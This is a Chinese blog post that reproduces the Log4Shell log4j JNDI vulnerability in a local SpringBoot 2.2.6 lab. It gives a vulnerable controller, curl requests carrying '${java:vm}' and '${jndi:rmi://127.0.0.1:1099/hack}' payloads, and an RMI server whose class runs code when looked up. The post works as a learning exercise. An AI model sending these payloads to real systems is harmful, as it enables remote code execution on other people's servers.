EUGENE

认清生活真相之后依然热爱它

最近出现的log4j漏洞,导致RNI远程调用问题,抱着好奇的心态来重现下。

环境搭建及测试代码

本文采用的是SpringBoot 2.2.6版本加一个RMI服务重现BUG,方式是通过在微服务工程里打log日志,以触发远程服务调用漏洞。

省略搭建微服务的过程,我使用的是社区版idea 2020.3.4,大家同样使用社区版的话,建议安装Spring assistant插件,可以很方便的搭建Springboot工程。

因为目前已经有了新版本的修复,这里建议大家使用Springboot2.2.6.RELEASE版本,其中带的log4j版本是2.12,这个版本是存在漏洞的哈。

项目依赖

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
    <version>2.2.6.RELEASE</version>
    <exclusions>
        <exclusion>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-logging</artifactId>
        </exclusion>
    </exclusions>
</dependency>
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-log4j2</artifactId>
    <version>2.2.6.RELEASE</version>
</dependency>

log记录

之后可以创建你的测试接口了。一个简单的测试用例,用log来记录入参,并返回参数。

private static final Logger logger = LogManager.getLogger(TestLog4JController.class);
@PostMapping(value = "hack")
public Object testLog4J(@RequestBody String params) {
    logger.info("params: {}",params);
    return params;
}

打印JVM参数

先来打印一下jvm参数到控制台。通过${java:vm}该参数在log中打印,log4j会将我们的jvm参数打印出来,这个问题不会导致严重的问题,但是可以让我们见识了log4j并不是简单的帮我们记录日志。

@request
curl --location --request POST 'http://127.0.0.1:8080/hack' \
--header 'Content-Type: application/json' \
--data-raw '{
    "command":"${java:vm}"
}'

日志输出

2021-12-20 12:02:27.549  INFO 71326 --- [nio-8080-exec-1] c.a.l.c.TestLog4JController              : params: {
    "command":"Java HotSpot(TM) 64-Bit Server VM (build 25.231-b11, mixed mode)"
}

远程服务调用

接下来我们先来构建一个远程服务,之后通过打印log日志来发起远程调用。

RMI服务创建

public static void main(String[] args) {
    try {
        LocateRegistry.createRegistry(1099);
        Registry registry = LocateRegistry.getRegistry();
        Reference reference = new Reference("com.away.log4j.impl.Execute",
                "com.away.log4j.impl.Execute", null);
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        System.out.println("service started");
        registry.bind("hack", referenceWrapper);
    } catch (RemoteException | NamingException | AlreadyBoundException e) {
        e.printStackTrace();
    }
}

public class Execute {
    public Execute() {
        System.out.println("Execute");
    }

    static {
        // 代码执行到这里,表示RMI调用成功
        System.out.println("freedom, can do anything!");
    }
}

上面的程序是构建远程服务,当你打印log日志的时候,可以通过JNDI发起一个远程调用,那么一旦服务调用发起,我们的程序就很可能遭受意外的攻击。

调用示例:

@request
curl --location --request POST 'http://127.0.0.1:8080/hack' \
--header 'Content-Type: application/json' \
--data-raw '{
    "command":"${jndi:rmi://127.0.0.1:1099/hack}"
}'

结果输出:

以上是一个简单的调用示例,通过RMI调用到目标主机,并实例化一段代码。可想而知,我们平时只是打印一个普通日志,却引来这么严重的问题,真的是不可思议。

标签:

分类:

更新时间:

猜您还喜欢

理解redis的zset并应用在排行榜功能中

Redis中的有序集合(sorted set),通常称为ZSET,是一种非常有用的数据结构。它类似于集合(SET),也是由不重复的元素组成的,但有序集合中的每个元素都会关联一个双精度浮点数作为分数(score),这个分数用于对元素进行排序。有序集合中的元素是唯一的,但是分数可以重复。

使用python绘制3D等高线

在本篇文章中,我们将快速地使用Python绘制精美的3D等高线图。通过详细的代码示例和注释,您将能够轻松理解每个步骤的实现过程。我们将使用NumPy库进行数值计算,并利用Matplotlib库进行数据可视化。

使用rich库中的progress bar实现个性化进度条

在本篇文章中,我们将使用Python的rich库中的progress包来实现个性化的进度条。进度条不仅可以提升用户体验,还能有效地展示程序的执行状态。通过丰富的自定义选项,您可以根据需求调整进度条的颜色、样式和文本信息,使其更具吸引力和实用性。无论是在命令行界面还是图形用户界面中,个性化的进度条都能为您的项目增添...

总结Java中常见的空指针NPE异常

在Java中,NullPointerException是一种非常常见的异常。常常出现在以下5种场景中: 参数值是包装类如Integer,在使用时会出现自动拆箱导致空指针; 字符串类型常常出现空指针异常; 例如ConcurrentHashMap这类不支持key或value为null,强行put nu...